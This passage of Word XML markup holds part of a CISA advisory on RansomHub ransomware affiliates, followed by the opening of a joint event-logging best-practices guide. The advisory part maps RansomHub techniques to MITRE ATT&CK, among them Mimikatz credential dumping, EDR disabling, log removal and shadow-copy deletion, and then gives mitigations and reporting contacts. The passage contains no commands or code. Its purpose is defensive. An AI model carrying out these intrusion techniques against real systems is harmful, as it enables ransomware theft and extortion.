        <w:t>Windows Management Instrumentation T1047 RansomHub affiliates may abuse Windows Management Instrumentation to execute malicious commands and payloads.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9: Persistence Technique Title ID Use Command and Scripting Interpreter T1059.001 RansomHub affiliates used PowerShell and Scripts to quickly run and automate intrusion.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Create Account T1136 RansomHub affiliates may create an account to maintain access to victim systems.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10: Privilege Escalation Technique Title ID Use Account Manipulation T1098 RansomHub affiliates may manipulate accounts to maintain and/or elevate access to victim systems.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Remote Services: Remote Desktop Protocol T1021.001 RansomHub affiliates may log onto systems using the Remote Desk Protocol, then perform actions as the logged-on user.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11: Defense Evasion Technique Title ID Use Masquerading T1036 RansomHub affiliates may hide binaries by renaming executable names.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Indicator Removal on Host T1070 RansomHub affiliates may remove logs to inhibit cybersecurity response.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Impair Defenses: Disable or Modify Tools T1562.001 RansomHub affiliates may disable endpoint detection and response (EDR) tooling to avoid detection.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12: Credential Access Technique Title ID Use OS Credential Dumping T1003 RansomHub affiliates used Mimikatz on Windows systems to gather credentials.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Brute Force: Password Spraying T1110.003 RansomHub affiliates may use password spraying to obtain initial access.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13: Discovery Technique Title ID Use Remote System Discovery T1018 RansomHub affiliates may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Network Service Discovery T1046 RansomHub affiliates may attempt to get a listing of services running on remote hosts and local network infrastructure devices,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14: Lateral Movement Technique Title ID Use Exploitation of Remote Services T1210 RansomHub affiliates may exploit remote service to gain unauthorized access to internal systems once inside of a network.</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15: Command and Control Technique Title ID Use Remote Access Software T1219 RansomHub affiliates may use Anydesk, a legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks.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16: Exfiltration Technique Title ID Use Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol T1048.002 RansomHub affiliates may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Transfer Data to Cloud Account T1537 RansomHub affiliates may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Unencrypted Non-C2 Protocol T1048.003 RansomHub affiliates may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.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17: Impact Technique Title ID Use Data Encrypted for Impact T1486 RansomHub affiliates used encryption for ransomware operations.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Inhibit System Recovery T1490 RansomHub ransomware deleted volume shadow copies and affiliates removed backups for ransomware operations. Incident Response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If compromise is detected, organizations should: Quarantine or take potentially affected hosts offline.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Reimage compromised hosts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Provision new account credentials.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Report the compromise to CISA via CISA's 24/7 Operations Center (report@cisa.gov or 888-282-0870). State, local, tribal, or territorial government entities can also report to the Multi-State Information Sharing and Analysis Center (MS-ISAC) (SOC@cisecurity.org or 866-787-4722). Mitigations Network Defenders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authoring organizations recommend organizations implement the mitigations below to improve cybersecurity posture based on RansomHub's activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA's Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Require all accounts with password logins (e.g., service accounts, admin accounts, and domain admin accounts) to comply with National Institute for Standards and Technology (NIST) standards for developing and managing password policies.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Use longer passwords consisting of at least 8 characters and no more than 64 characters in length; Store passwords in hashed format using industry-recognized password managers; Add password user "salts" to shared login credentials; Avoid reusing passwords; Implement multiple failed login attempt account lockouts; Disable password "hints"; and Refrain from requiring password changes more frequently than once per year. Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password "patterns" cyber criminals can easily decipher.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Require administrator credentials to install software.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Keep all operating systems, software, and firmware up to date [CPG 1.E]. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Require Phishing-Resistant multifactor authentication to administrator accounts [CPG 2.H] and require standard MFA for all services to the extent possible (particularly for webmail, virtual private networks, and accounts that access critical systems).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Segment networks [CPG 2.F] to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between-and access to-various subnetworks and by restricting adversary lateral movement.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool [CPG 3.A]. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Install, regularly update, and enable real time detection for antivirus software on all hosts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement Secure Logging Collection and Storage Practices [CPG 2.T]. Learn more about logging best practices by referencing CISA's Logging Made Easy resources.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Disable unused ports.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement and enforce email security policies [CPG 2.M].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Disable macros by default [CPG 2.N].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Consider adding an email banner to emails received from outside your organization.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Disable hyperlinks in received emails.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally. Maintain offline backups of data, and regularly maintain backup and restoration [CPG 2.R]. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization's data infrastructure. Software Manufacturers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above mitigations apply to enterprises and critical infrastructure organizations with on-premises or hybrid environments. Recognizing that insecure software is the root cause of many of these flaws and that the responsibility should not be on the end user, CISA urges software manufacturers to implement the following to reduce the prevalence of identified or exploited issues (e.g., misconfigurations, weak passwords, and other weaknesses identified and exploited through the assessment team): Embed security into product architecture throughout the entire software development lifecycle (SDLC).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Mandate MFA, ideally phishing-resistant MFA, for privileged users and make MFA a default, rather than opt-in, feature.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These mitigations align with tactics provided in the joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software. CISA urges software manufacturers to take ownership of improving the security outcomes of their customers by applying these and other secure by design tactics. By using secure by design tactics, software manufacturers can make their product lines secure "out of the box" without requiring </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>customers to spend additional resources making configuration changes, purchasing security software and logs, monitoring, and making routine updates.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more information on secure by design, see CISA's Secure by Design webpage. Validate Security Controls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addition to applying mitigations, CISA recommends exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&amp;CK for Enterprise framework in this advisory. The authoring organizations recommend testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.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 get started: Select an ATT&amp;CK technique described in this advisory (see Table 6-Table 17). Align your security technologies against the technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Test your technologies against the technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Analyze your detection and prevention technologies' performance.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Tune your security program, including people, processes, and technologies, based on the data generated by this process.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CISA, FBI, MS-ISAC, and HHS recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory. Resources #StopRansomware is a whole-of-government approach that gives one central location for ransomware resources and alerts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Resource to reduce the risk of a ransomware attack: #StopRansomware Guide. No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Health and Human Services HPH Cybersecurity Gateway hosts the HPH CPGs and links to HHS cybersecurity resources. References Ransomware Roundup - Knight | FortiGuard Labs (fortinet.com) Knight Ransomware - X-Industry - Red Sky Alliance Cyclops Ransomware and Stealer Combo: Exploring a Dual Threat (uptycs.com) Knight ransomware distributed in fake Tripadvisor complaint emails (bleepingcomputer.com) Reporting</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Your organization has no obligation to respond or provide information to the FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to the FBI, reporting must be consistent with applicable state and federal laws.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FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.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Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.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authoring organizations do not encourage paying a ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI's Internet Crime Complain Center (IC3), a local FBI Field Office, or CISA via the agency's Incident Reporting System or its 24/7 Operations Center (report@cisa.gov) or by calling 1-844-Say-CISA (1-844-729-2472). Disclaimer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information in this report is being provided "as is" for informational purposes only. The authoring organizations do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring organizations.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product is provided subject to this Notification and this Privacy &amp; Use policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cybersecurity and Infrastructure Security Agency 2024.08.29 20:52</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-242a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Best Practices for Event Logging and Threat Detection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Release Date August 21, 2024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Alert Code AA24-234A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Cybersecurity Best Practices, Critical Infrastructure Security and Resilience, Organizations and Cyber Safety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Executive Summary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publication defines a baseline for event logging best practices to mitigate cyber threats. It was developed by the Australian Signals Directorate's Australian Cyber Security Centre (ASD's ACSC) in cooperation with the following international partners: United States (US) Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI) and the National Security Agency (NSA).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>United Kingdom (UK) National Cyber Security Centre (NCSC-UK).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Canadian Centre for Cyber Security (CCCS).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>New Zealand National Cyber Security Centre (NCSC-NZ) and Computer Emergency Response Team (CERT NZ).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Japan National Center of Incident Readiness and Strategy for Cybersecurity (NISC) and Computer Emergency Response Team Coordination Center (JPCERT/CC). The Republic of Korea National Intelligence Services (NIS) and NIS's National Cyber Security Center (NCSC-Korea).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Singapore Cyber Security Agency (CSA).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The Netherlands General Intelligence and Security Service (AIVD) and Military Intelligence and Security Service (MIVD).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Event logging supports the continued delivery of operations and improves the security and resilience of critical systems by enabling network visibility. This guidance makes recommendations that improve an organization's resilience in the current cyber threat environment, with regard for resourcing constraints. The guidance is of moderate technical complexity and assumes a basic understanding of event logging.</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 effective event logging solution aims to: Send alerts to the network defenders responsible for monitoring when cyber security events such as critical software configuration changes are made or new software solutions are deployed.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Identify cyber security events that may indicate a cyber security incident, such as malicious actors employing living off the land (LOTL) techniques or lateral movement post-compromise.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Support incident response by revealing the scope and extent of a compromise. Monitor account compliance with organizational policies.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Reduce alert noise, saving on costs associated with storage and query time. Enable network defenders to make agile and informed decisions based on prioritization of alerts and analytics.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ensure logs and the logging platforms are useable and performant for analysts.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are four key factors to consider when pursuing logging best practices: Enterprise-approved event logging policy.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Centralized event log access and correlation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Secure storage and event log integrity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Detection strategy for relevant threats.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 access the PDF version of this report, visit here. Introduction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increased prevalence of malicious actors employing LOTL techniques, such as LOTL binaries (LOLBins) and fileless malware, highlights the importance of implementing and maintaining an effective event logging solution. As demonstrated in the joint-sealed publication Identifying and Mitigating Living Off the Land Techniques, advanced persistent threats (APTs) are employing LOTL techniques to evade detection. The purpose of this publication is to detail best practice guidance for event logging and threat detection for cloud services, enterprise networks, enterprise mobility, and operational technology (OT) networks. The guidance in this publication focuses on general best practices for event logging and threat detection; however, LOTL techniques feature as they provide a great case study due to the high difficulty in detecting them. Audience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guidance is technical in nature and is intended for those within medium to large organizations. As such, it is primarily aimed at: Senior information technology (IT) and OT decision makers.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>IT and OT operators.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
